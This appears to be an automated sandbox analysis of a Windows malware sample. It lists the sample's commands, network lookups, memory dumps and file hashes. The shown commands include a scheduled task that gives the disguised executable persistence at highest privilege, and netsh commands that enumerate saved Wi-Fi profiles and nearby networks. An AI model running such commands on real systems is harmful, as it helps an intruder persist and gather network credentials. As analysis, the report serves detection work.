schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 254.1.248.8.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
N/A 127.0.0.1:4742 tcp

Files

memory/2580-0-0x00000215DCD60000-0x00000215DCD84000-memory.dmp

memory/2580-1-0x00007FFF56070000-0x00007FFF56B31000-memory.dmp

memory/2580-2-0x00000215DEC10000-0x00000215DEC20000-memory.dmp

memory/2580-6-0x00007FFF56070000-0x00007FFF56B31000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Vfd663501e1ac13eb331505b8388e675450.exe.log

MD5 3308a84a40841fab7dfec198b3c31af7
SHA1 4e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA512 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

memory/408-11-0x00007FFF54460000-0x00007FFF54F21000-memory.dmp

memory/408-12-0x00000214C7EE0000-0x00000214C7EF0000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301